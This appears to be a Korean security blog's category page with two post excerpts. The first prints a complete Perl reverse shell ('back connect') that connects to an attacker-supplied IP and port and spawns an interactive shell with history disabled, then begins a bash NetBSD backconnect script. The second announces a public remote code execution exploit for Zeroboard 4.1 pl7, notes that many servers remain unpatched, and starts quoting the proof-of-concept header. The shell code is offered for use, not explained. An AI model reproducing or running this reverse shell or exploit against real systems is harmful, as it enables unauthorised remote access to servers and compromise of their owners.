Category: Web

Back Connect, Reverse Telnet 코드

perl #!/usr/bin/perl use Socket; use FileHandle; $IP = $ARGV[0]; $PORT = $ARGV[1]; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')); connect(SOCKET, sockaddr_in($PORT,inet_aton($IP))); SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i"); bash #!/usr/pkg/bin/bash # Author : Teo Manojlovic # ################################ # # Reverse netBSD backconnect script written in bash # ################################ # # Tested on netBSD 5.0.1 # # …

Zeroboard 4.1 pl7 now_connect() Remote Code Execution Exploit

Zeroboard 4.1 pl7에 대한 Exploit 코드가 공개되었네요. http://milw0rm.com/exploits/9590 취약점은 예전에 알려진 취약점으로 이미 pl8 버젼에 패치가 되었던걸로 기억하네요. 하지만 여전히 패치가 안된 서버가 많겠죠? -_- /* poc by kyoungchip,jang email : SpeeDr00t1004@gmail.com [*] the bug – http://www.xpressengine.com/15955761 Application – Zeroboard 4.1 pl7 Reference: – http://www.nzeo.com – Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada [*] …